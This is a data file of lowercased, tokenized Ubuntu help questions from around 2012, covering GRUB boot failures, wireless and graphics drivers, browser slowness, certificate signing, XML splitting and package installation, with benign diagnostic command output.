147370	how do i start a ruby/gem program ?	i have installed taskjuggler ( gem install taskjuggler ) , but now i have no idea how to start it ... $ taskjuggler taskjuggler : command not found $ gem taskjuggler error : while executing gem ... ( runtimeerror ) unknown command taskjuggler this one was on the taskjuggler page , with no explanation : $ gem `` taskjuggler '' , `` ~ > 3.2.0 '' error : while executing gem ... ( runtimeerror ) unknown command taskjuggler , also , the installation page tells nothing about how to run it . how do i run this program ? -- update : $ path bash : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : no such file or directory
147377	how to debug slow browsing speed ?	i 'm using ubuntu 12.04 , chromium 18.0.1025.151 ( developer build 130497 linux ) ubuntu 12.04 , firefox 12.0 but i 'm getting poor browsing speed . the browser always shows `` waitng for aaa.bbb.com '' at the bottom of the browser . how can i debug this and find out the reason ? i 'm connecting to 3g network via bluetooth pan network of an android device . some stats below . $ dig asdsa.com ; < < > > dig 9.8.1-p1 < < > > asdsa.com ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 39878 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 13 , additional : 13 ; ; question section : ; asdsa.com . in a ; ; answer section : asdsa.com . 307707 in a 200.31.91.194 ; ; authority section : com . 34662 in ns e.gtld-servers.net . com . 34662 in ns a.gtld-servers.net . com . 34662 in ns k.gtld-servers.net . com . 34662 in ns h.gtld-servers.net . com . 34662 in ns g.gtld-servers.net . com . 34662 in ns l.gtld-servers.net . com . 34662 in ns j.gtld-servers.net . com . 34662 in ns c.gtld-servers.net . com . 34662 in ns b.gtld-servers.net . com . 34662 in ns m.gtld-servers.net . com . 34662 in ns d.gtld-servers.net . com . 34662 in ns f.gtld-servers.net . com . 34662 in ns i.gtld-servers.net . ; ; additional section : a.gtld-servers.net . 50538 in a 192.5.6.30 a.gtld-servers.net . 59333 in aaaa 2001:503 : a83e : :2:30 b.gtld-servers.net . 40208 in a 192.33.14.30 b.gtld-servers.net . 45531 in aaaa 2001:503:231d : :2:30 c.gtld-servers.net . 45531 in a 192.26.92.30 d.gtld-servers.net . 45526 in a 192.31.80.30 e.gtld-servers.net . 45526 in a 192.12.94.30 f.gtld-servers.net . 40177 in a 192.35.51.30 g.gtld-servers.net . 35936 in a 192.42.93.30 h.gtld-servers.net . 40177 in a 192.54.112.30 i.gtld-servers.net . 45526 in a 192.43.172.30 j.gtld-servers.net . 45526 in a 192.48.79.30 k.gtld-servers.net . 35936 in a 192.52.178.30 ; ; query time : 227 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) ; ; when : wed jun 6 22:40:19 2012 ; ; msg size rcvd : 499 $ ping google.com ping google.com ( 74.125.236.199 ) 56 ( 84 ) bytes of data . 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=1 ttl=54 time=173 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=2 ttl=54 time=162 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=3 ttl=54 time=228 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=4 ttl=54 time=236 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=5 ttl=54 time=162 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=6 ttl=54 time=215 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=7 ttl=54 time=218 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=8 ttl=54 time=232 ms 64 bytes from maa03s17-in-f7.1e100.net ( 74.125.236.199 ) : icmp_req=9 ttl=54 time=212 ms ^c -- - google.com ping statistics -- - 9 packets transmitted , 9 received , 0 % packet loss , time 8007ms rtt min/avg/max/mdev = 162.119/204.385/236.105/28.286 ms also is there a browser that provides more verbose while loading a page ? edit : more info from the answer of @ izx $ curl -w `` @ curl-timing.cfg '' -o /dev/null -s http : //www.google.com/ dns lookup : 0.363 connect to server ( tcp ) : 0.512 connect to server ( http/s ) : 0.000 time from start until transfer began : 0.512 time for redirection ( if any ) : 0.000 total time before transfer started : 0.749 total time : 0.749 size of download ( bytes ) : 221 average d/l speed ( bytes/s ) : 294.000 $ curl -w `` @ curl-timing.cfg '' -o /dev/null -s http : //india.gov.in dns lookup : 0.351 connect to server ( tcp ) : 0.526 connect to server ( http/s ) : 0.000 time from start until transfer began : 0.526 time for redirection ( if any ) : 0.000 total time before transfer started : 0.770 total time : 1.643 size of download ( bytes ) : 34346 average d/l speed ( bytes/s ) : 20905.000
147379	how do i digitally sign a pdf ?	i have already acquired a s/mime certificate ( a .p12 file ) issued by an authority . using it in writer , i can digitally sign documents by following this procedureâ : â how do i make a digital certificate available to libreoffice writer for digital signatures ? can i do the same for pdf files ? if yes , what method do you suggest me ? i would prefer a solution that relies on free software .
147380	can i use other desktop environment in ubuntu-studio and exchange whenever i want ? , xfce to unity & vise	i have ubuntu-studio 12.04 installed and i really want to have both xfce and unity desktop , can i install both and use one of them when ever i want login ? if so can you give me a little guide . thanks for answers .
147383	is there any file password protection ( ntfs ) ? i want to hide & prevent of use !	is there any file password protection ( ntfs ) ? i want to hide & prevent of use ! i know that i can hide with `` .folder '' , but i want something whithout changing the name and i can hide or password it . file is on windows partition . thanks for answers .
147384	send current workspace to another computer ?	i have a desktop and laptop , both running ubuntu 12.04 . frequently when working , i will need to move from the desktop to the laptop and go on the road . is there any way possible that on the desktop , i could send a current workspace , with windows open , programs up , browser tabs open , to my second computer ? i dont want to work primarily on the laptop , because it is slower , but being able to queue things up on the desktop and send them to the laptop to have ready for when i leave would be unbelievably time saving . i have explored remote desktop , but it seems overkill to send entire video/image stream between the computers when i basically just need to run some commands on the remote computer ( i believe ? ) . any information would be helpful . thanks
147386	how do i digitally sign emails outgoing from different identities ?	to send emails , i use one smtp server , say domain1.com . but i use two identities that set up in thunderbird , say agmenor @ domain1.com and agmenor @ domain2.com . for those who are not knowledgeable about it , this means that my addressees see emails coming from agmenor @ domain1.com and from agmenor @ domain2.com , with no evident link between the two . furthermore , i was issued a smime certificate for each identity from an authority , in the form of a .p12 file . this permits me to digitally sign my emails . how do i set up thunderbird so that it signs my outgoing emails with the correct certificate respectively to each identity ? the problem i now face is that i know only how to associate my smtpâ server to a certificate , but not to each identity separately .
147388	eee 1015pn less battery lifetime	i have installed ubuntu 12.04lts ( 32bit ) on my asus eee 1015pn . i have installed the vga-switch von mtron too ( https : //sites.google.com/site/mtrons/projects/eee1015pn ) . the problem is that in windows i get 6-7 hours running time on battery and with ubuntu i get only 4-5 hours . another problem is that when windows is idle the fan from the netbook stops whereas in ubuntu the fan never stops running . the temperature is in windows 38째c and in ubuntu 51째c .
147393	setting up java web start for firefox when the jdk is in a personalized location	do i need a symlink to make javaws , that is , java web start , work if i have a personalized location for my java ? i have installed java as follows : sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /home/user/programs/jdk6u32/bin/java '' 1 sudo update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /home/user/programs/jdk6u32/bin/javaws '' 1 sudo update-alternatives -- config java sudo update-alternatives -- config javaws sudo ln -s /home/user/programs/jdk6u32/jre/lib/amd64/libnpjp2.so /usr/lib/firefox-addons/plugins/libnpjp2.so the last line is necessary for firefox to find the java plug-in . it sets up a symlink . it was due to advice found on stackexchange and i suspect i need something similar for javaws and if so , what would it be ? i am on ubuntu 12.04 ( precise ) and firefox 12.0 and oracle java 6 update 32 .
147396	wubi boots into grub after 12.04 install	i would just like to recover the files off of the wubi install and then install a proper version of ubuntu , is there any way to recover the files ? for further information . i had ubuntu 11.04 and used the update manager to update it to 12.04. it worked for aproximitely a day and then i had to do a hard reset the next day after what seemed to be artifact corruption . upon trying to reboot into ubuntu it brings up the grub command prompt '' gnu grub version 1.99-12ubuntu5 '' i have previously done hard resets on it in the past , there is nothing in my windows hidden 000 recovery folder .
147397	pulse audio volume control forgets settings	in input devices tab port is set to line in , i change it to front microphone , but it always returns back to line in after restart . how can i change it permanently ? i guess the reason is that when system boots , mic is not plugged in front , so it switch it to back by default . removing the .pulse directory from my home directory did n't work some additional info : $ pactl list sources https : //gist.github.com/3914307 $ cat /etc/pulse/default.pa https : //gist.github.com/3914316 $ arecord -l https : //gist.github.com/3915130 $ pactl list sources https : //gist.github.com/e6fa252686b4e4529032
147398	ubuntu server , exim4 and spam lists	i have a ubuntu server with exim4 mta . everything is running ok . i must integrate spam lists , in exim4 . how can i integrate spam lists with exim4 ? one of the spam list i want to integrate is from spamhaus .
147400	problems with eclipse and android sdk	i installed eclipse , openjdk6 and downloaded and extracted the sdk manager file . now , when i created an android project i got the following error : 2012-06-06 18:44:40 - contactmanager ] /home/catia/android-sdks/platform-tools/aapt : error while loading shared libraries : libz.so.1 : can not open shared object file : no such file or directory and this one when i tried to create an avd manager : [ 2012-06-06 19:00:18 - sdk manager ] /home/catia/android-sdks/tools/mksdcard : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory [ 2012-06-06 19:00:18 - sdk manager ] failed to create the sd card . [ 2012-06-06 19:00:18 - sdk manager ] failed to create sdcard in the avd folder .
147402	alt key in 12.04	the new hud in 12.04 uses the alt key , which conflicts with the way utilities like ibus switch input methods . is there a workaround ?
147412	ubuntu running slowly after upgrade to 12.04	i recently updated my system from 11.04 to 12.04 . ui is too slow . system specs : acer aspire 4715z , 1gb ram , dual-core , mobile intel grahics reading other links suggest to switch back to gnome/unity 2d , but unity was working fine in 11.04 . does any other upgrade is required ?
147413	grub has two time the same kernels in menu	after update ( yesterday ) from ubuntu 12.04 , grub has two of the same kernels in the boot menu for ubuntu 12.04 ( i have triple boot ) . i have already reinstalled grub , but with the same result . it seems to me that something is going wrong in update-grub : generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found windows vista ( loader ) on /dev/sda2 found ubuntu 11.04 ( 11.04 ) on /dev/sda7 done there is no problem for boot but this is not nice . solution ?
147415	eclipse will at seemingly random times cause random characters to be inserted or deleted when editing a file	i will be programming my merry heart out when suddenly nothing i type makes sense , it starts adding in incorrect characters and deleting random chunks of code whenever i press a key . undo actually makes the problem worse . this can all be fixed by force quiting eclipse ( once this starts happening it 's impossible to quit normally ) and restarting it . i thought it might have something to do with my installation , but i 've now had it happen across multiple different ubuntu versions on different computers ( also in a crunchbang installation ) . i have no idea what is going on here , and have not been able to find any references to people having the same problem . it seems to happen more often when editing files with both php and html in them , specifically when editing the html parts . what is causing this and how can i fix it short of switching to another ide ( which believe me , i am very close to doing even though i would have to re-setup all my projects ) . edit : after more thorough searching through the eclipse bug reports i found a bug report with the same problem . it has been confirmed on windows vista , windows xp , windows seven , ubuntu , and arch linux .
147416	short of a clean install , is there anyway to revert everything back to the original packages and settings ?	i have an a few machines that i was planning to run in a cluster , but have decided after some testing to configure them differently . the partitions and ubuntu install are still as i want them , but it would be nice to have them back to a clean state without having to re-install them all .
147417	how do i get an atheros ar242 / ar542 wireless card working ?	i am brand new to ubuntu as a laptop platform . as a developer i 've used it as an app server but with minimal interaction . so , i recently took my windows laptop and installed the latest 12.04 package . most everything works great and i 'm very happy . however , the wireless is very choppy . ( you can see the button that enables the wireless flash on and off . ) i have tried several steps mentioned in other posts but , being a newbie , i 'm afraid i 'm doing more harm than good . the information i can provide follows . any help would be greatly appreciated . lspci 01:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 )
147421	dlink wireless adapter dwa 125 on ubuntu 11.04	i am new to linux , bought a desktop computer a couple of days ago with linux ubuntu 11.04 installed on it . i think its wonderful , i have one issue however . i need an `` in laments terms '' step-by-step way to configure my dlink dwa 125 n 150 to work wirelessly . i feel as though ive tried every forum , and guide , ive even spoken to a tech savvy friend and nothing seems to be working . ive installed the driver properly albeit i have no way of seeing installed properly ( im new ) if someone could please please help me as soon as possible that would be awesome . thanks ! sara
147422	update manager reports a `` 404 - failed to fetch '' for a deb file	update manager is reporting this error : failed to fetch us.archive.ubuntu.com/ubuntu/pool/main/s/software-center/software-center_5.2.2_all.deb 404 not found i checked and my internet connection is working fine .
147425	ubuntu 12.04 system freezing when not connected to lan	i was able to install 12.04 ok on my acer emachines , but whenever it is unplugged from the lan connection , the whole system freezes . i 've installed the latest updates and it 's still behaving the same . i am not sure where to start to troubleshoot the issue , anyone here has any idea ? info about my network cards : 06:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 07:00.0 ethernet controller : atheros communications inc. ar8152 v2.0 fast ethernet ( rev c1 ) bug reported here : https : //bugs.launchpad.net/ubuntu/+source/linux-base/+bug/1006127
147428	persian/farsi videos subtitle problem ?	i have problem with subtitle in persian/farsi using all good video players . i have tested all reading options formats ( all different area and language to read ) , but all did not work . i can type farsi , but it can not show subtitle to farsi .
147438	split a large xml file by a certain node into smaller files	i 've got a xml file with 1gb ( about 6000000 lines ) . the goal is to split this file into smaller .xml files with more or less 20000 lines each . < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype icecat-interface system `` http : //data.icecat.biz/dtd/files.index.dtd '' > < ! -- source : icecat.biz 2012 -- > < icecat-interface xmlns : xsi= '' http : //www.w3.org/2001/xmlschema-instance '' xsi : nonamespaceschemalocation= '' http : //data.icecat.biz/xsd/files.index.xsd '' > < files.index generated= '' 20120418012252 '' > < file path= '' export/level4/pt/726463.xml '' product_id= '' 726463 '' updated= '' 20110815090811 '' quality= '' icecat '' supplier_id= '' 393 '' prod_id= '' 174174 '' catid= '' 575 '' on_market= '' 0 '' model_name= '' caplio r4 6.0mpix silver '' product_view= '' 4052 '' highpic= '' http : //images.icecat.biz/img/norm/high/726463-490.jpg '' highpicsize= '' 102843 '' highpicwidth= '' 800 '' highpicheight= '' 600 '' date_added= '' 20070219000000 '' > < ean_upcs > < ean_upc value= '' 4961311027048 '' / > < /ean_upcs > < /file > ... < file path= '' export/level4/pt/738860.xml '' product_id= '' 738860 '' updated= '' 20101217151007 '' quality= '' icecat '' supplier_id= '' 169 '' prod_id= '' hej423020f9at0c '' catid= '' 219 '' on_market= '' 0 '' model_name= '' endurastar j4k30 '' product_view= '' 1160 '' highpic= '' http : //images.icecat.biz/img/norm/high/738860-3355.jpg '' highpicsize= '' 52197 '' highpicwidth= '' 175 '' highpicheight= '' 212 '' date_added= '' 20070219000000 '' > < /file > < /files.index > < /icecat-interface > for similar situations , i 've used split or grep , but to this particular case , it gets trickier : 1 ) the splitting process must occur under a specific node name , e.g , < /file > to preserve the integrity of the file . 2 ) the destination files must contain a header and a footer , to make the file valid and properly readable . header < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype icecat-interface system `` http : //data.icecat.biz/dtd/files.index.dtd '' > < ! -- source : icecat.biz 2012 -- > < icecat-interface xmlns : xsi= '' http : //www.w3.org/2001/xmlschema-instance '' xsi : nonamespaceschemalocation= '' http : //data.icecat.biz/xsd/files.index.xsd '' > < files.index generated= '' 20120418012252 '' > footer < /files.index > < /icecat-interface > 3 ) finally , my lack of solutions to this issue is due to the fact that this `` action '' will be repeated from time to time on a scheduled cron . note : the destination files can have any name , the directory lets assume to be the same where the script is running .
147439	grub wo n't boot windows after update from 11.10 to 12.04	thanks for your time and reading this , here 's the deal : i upgraded from 11.10 to 12.04 and everything worked out until i rebooted , i had 11.10 sucessfully running as a dual boot with windows vista . when i rebooted , my grub was shot to hell , what ever option i selected it said partion not found or something similar ... booting into a live version on a thumb drive and running bootrepair from there fixed the issue ... but only for ubuntu , when i try to boot into windows it only goes back to grub . i 'm not at home , and heres a list of what i have here with me ... 1 4gb thumb drive , empty 1 8gb thumb drive , windows vista installer bootable 1 old laptop , the one i try to save , optical drive is not existent 2 mbps internet connection can you help me get back into my windows without having to reinstall windows ? or at least show me a way how to use my illustrator through a virtual machine or something ? here 's my grub cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e set locale_dir= ( $ root ) /boot/grub/locale set lang=de_de insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , mit linux 3.2.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e linux /boot/vmlinuz-3.2.0-24-generic root=uuid=1063e402-b14f-45e5-92b6-d20a2e3a717e ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic } menuentry 'ubuntu , mit linux 3.2.0-24-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e echo 'linux 3.2.0-24-generic wird geladen …' linux /boot/vmlinuz-3.2.0-24-generic root=uuid=1063e402-b14f-45e5-92b6-d20a2e3a717e ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.2.0-24-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , mit linux 3.0.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e linux /boot/vmlinuz-3.0.0-19-generic root=uuid=1063e402-b14f-45e5-92b6-d20a2e3a717e ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.0.0-19-generic } menuentry 'ubuntu , mit linux 3.0.0-19-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e echo 'linux 3.0.0-19-generic wird geladen …' linux /boot/vmlinuz-3.0.0-19-generic root=uuid=1063e402-b14f-45e5-92b6-d20a2e3a717e ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1063e402-b14f-45e5-92b6-d20a2e3a717e linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows vista ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 2c9e66b39e6674ec chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
147441	no install along windows option in 12.04 cd	i have downloaded 12.04 cd via torrent from ubuntu site . when i mount the cd on magicdisk it does not show the install along windows ( something like that ) option . how can i do that and why is n't it available ? thanking you . salik sadruddin merani developer and co-owner of g.nomote - world is just a gesture away ... edit : this is the picture of the window : http : //www.gnomote.tk/extra_images/ubuntu.jpg
147442	ca n't install the ati fglrx driver , using a ati rv635 - mobility radeon hd 3650	i 'm having problems with the ati driver . it says that the system is not using the proprietary controller . i ca n't activate it and there are n't any suggestions on how to solve this . i saw on another post an answer that recommends installing 'linux ati catalyst driver'from http : //support.amd.com/fr/gpudownload/linux/pages/radeon_linux.aspx should i do that ? or is there a way around this . thank you !
147445	how to create a wifi hotspot and use it on wp7.5 ?	i have been trying for many days to create a wifi hotspot with my laptop running ubuntu 12.04 and connect it to my windows phone7.5 based htc mozart . i have gone through many articles related to this , but none of them help . i create a wifi hotspot as suggested by some experts , but it is n't detected either by my phone or on other laptops . my laptop is sony vaio vpceb14en with these specifications .
147458	how do i access file manager and change to list view	this is a daft question even to me - but i am new to ubuntu so pls bear with me . i have installed ubuntu 12.04 lts . now ubuntu is running and the most obvious way to explore my file system is the home button on the top left , but it shows icons instead of a list view . goggleing how to change it keeps talking about going to edit in the filemanager and change it - problem is there is no edit menu when i click that home button - and i am not even sure i am in the filemanager . so hence - how do i access the filemanager - or if i am in it - where is that damn edit menu so i can change to listview instead of that annoying icon view ?
147459	what 's the location of a personal 'gtkrc ' file in ubuntu 12.04 ?	good day everyone ! i am currently writting a software that makes easy to change default cursor theme with a few clicks . at this point it works well , but applications like firefox or lazarus ide remain with the dmz-white cursor , everything else is ok . i noticed that when i change the default cursor using my software , and later change the 'personalized ' cursor theme using ubuntu tweak , it does the job , and the new theme is now applied everywhere . so , what file is need to modify in order to change 'personal ' cursor theme ? if my software can do this , that would be great ! i found that 'gtkrc ' is a file where settings of gtk+ are stored . i searched in my home folder but i ca n't find yet . can you help me with this , noble people of ubuntu ? : )
147462	how can i change the tty colors ?	how can i change the standard 8 colors ( 16 if you count the bright versions ) that are used in the various ttys in ubuntu 12.04 ? i 'm not talking about the terminal or xterm applications , i 'm talking about the ttys that you access via ctrl+alt+f1 through ctrl+alt+f6 . i do n't want to change what colors are being used in which places , i want to tweak what the colors look like . for example , i do n't want to change what red is used for , i just want to change what the red looks like -- such as using # ff6c60 as red instead of # ff0000 .
147463	99 % cpu usage for no reason	10 minutes ago i was just surfing the web as usual on my ubuntu 10.04 , when all of a sudden the system became slow . i realized that the cpu usage is 99 % . i opened system monitor and everything seemed fine . i could n't see any process that used a lot of cpu . i logged out and logged in , and cpu usage was still 99 % . then i rebooted and now everything is ok. what happened and why could n't i see the process that used so much cpu ? what to do if that happens again ? i want to solve the problem , not to reboot every time that happens . here it is again . it 's because of gparted . everything worked fine until i started it . and now it 's 99 % again . i closed gparted and still 99 % . i ca n't find gparted process . here is the `` top '' output pid user pr ni virt res shr s % cpu % mem time+ command 1570 tuks 20 0 40720 3644 2832 s 29 0.1 2:04.88 gvfs-gdu-volume 1572 root 20 0 15800 3156 2444 r 24 0.1 1:45.74 udisks-daemon 2058 tuks 20 0 649m 257m 34m s 22 6.4 161:26.52 firefox 1556 tuks 20 0 18676 7104 5504 r 16 0.2 1:08.85 gdu-notificatio 906 messageb 20 0 9292 7448 760 r 16 0.2 1:09.08 dbus-daemon 2066 tuks 20 0 41864 11m 8412 s 16 0.3 1:11.66 update-notifier 500 root 18 -2 2624 944 332 s 6 0.0 0:26.09 udevd 6250 tuks 20 0 360m 150m 21m s 5 3.7 45:30.14 plugin-containe 1065 root 20 0 78444 36m 12m s 4 0.9 224:50.06 xorg 1427 tuks 9 -11 158m 10m 8592 s 3 0.3 23:28.05 pulseaudio 369 root 20 0 4104 1268 980 s 3 0.0 0:11.06 mountall 1 root 20 0 2792 1720 1200 s 2 0.0 0:09.07 init 392 root 20 0 2312 824 612 s 2 0.0 0:06.68 upstart-udev-br 394 root 16 -4 2644 964 308 s 1 0.0 0:05.96 udevd 1419 tuks 20 0 57288 21m 11m s 1 0.5 8:21.97 python 1411 tuks 20 0 83048 30m 9524 s 1 0.8 50:33.01 compiz 1444 tuks 20 0 57152 21m 11m s 1 0.5 6:06.30 python 6834 tuks 20 0 79980 27m 19m s 1 0.7 5:49.54 smplayer 1438 tuks 20 0 58376 22m 11m s 1 0.6 4:30.69 python 1440 tuks 20 0 239m 56m 19m s 1 1.4 7:45.33 skype 5045 tuks 20 0 52204 13m 9.8m s 1 0.3 0:01.65 gnome-terminal now i logged out and logged in and cpu usage is normal . i started gparted and this time everything is ok . i am very confused
147464	do i need to install a package ( openswan or strongswan maybe ) to use ipsec ?	i want to connect to a windows share that only accepts ipsec transport mode . i have a list of security policies and a shared secret . i 've skimmed through the man page on ipsec.conf on the web and it seems to be the place to put these polices . if ipsec is part of the kernel ( and i think it is , i 'm using ubuntu 12.04 ) do i need to install some other package in order to get this working ? i 'm guessing it 's either openswan or strongswan but do n't know the difference .
147466	how to add programs to ubuntu without internet access	i do n't have internet access at my home and it takes me about a half hour to ride my bike to the library . i have downloaded .deb files to try to install at my home computer but everyone i have downloaded says it ca n't install because it depends on package x . the next day i will download package x and it will require package y . is there anyway to find out what all the sub-dependencies are for deb files ? i have tried to boot from usb or external hard drive on the library computers but the security settings prevent this . also , i do not know anyone with a linux computer .
147470	open with ubuntu software center in kde	i bought the humble bundle pack and how can i open it with software-center ? i normally use software-center . when i click on `` download for ubuntu '' i get this ↓ and when i click on `` launch application '' i get this ↓
147471	importerror : no module named linuxmint	every time i attempt an installation using apt-get in terminal , i get the following errors : importerror : no module named linuxmint dpkg : error processing opera ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already processing triggers for menu ... errors were encountered while processing : opera e : sub-process /usr/bin/dpkg returned an error code ( 1 ) in addition , ubuntu software center is not working correctly . i 'm using ubuntu 11.10 not linux mint . i have installed cinnamon but not using it , maybe that 's why linux mint is mentioned in that error report .
147473	how do i mount my external usb drive from the livecd so i can get files off of my laptop ?	my laptop running ubuntu 11.10 was updated to 12.04 but failed halfway through update . i had no option but to turn the laptop off as it had frozen and back on again to find the laptop non functioning . i then made a ubuntu 12.04 boot cd to boot the laptop to save my files from the internal laptop hard drive to the external hard drive off my pc running windows xp via usb no problems there but then i proceeded in a very tired state to install ubuntu 12.04 from the cd i choose the partition method the first option of 3 to keep files and folders i started the install and a few seconds in noticed it was writing to my external usb drive got scared and pulled the usb lead then proceeded to do a normal install of ubuntu 12.04 on my laptop but now ubuntu will not open my external 250 gb hdd but does recognise it as such in disk utility . instead of mounting it gives this message . error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . windows does not recognise it as anything neither does easus . please help i desperatly need all my files back i feel such an idiot . ok getting there i just managed to copy all my files from the external to the laptop using test disk and then suddenly the laptop cut out and rebooted itself into low graphics mode i get 4 options nothing works it keeps looping betwean this and a grub mode and will no longer accept my password in the black screen mode man this is cruel please can anyone help
147474	how can i find boost version ?	i just want to know how i can find the version of boost installed in my ubuntu 12.04 ? i am having trouble with the current precise and thinking of reverting back to 8.04 . what is the boost version in 8.04 ?
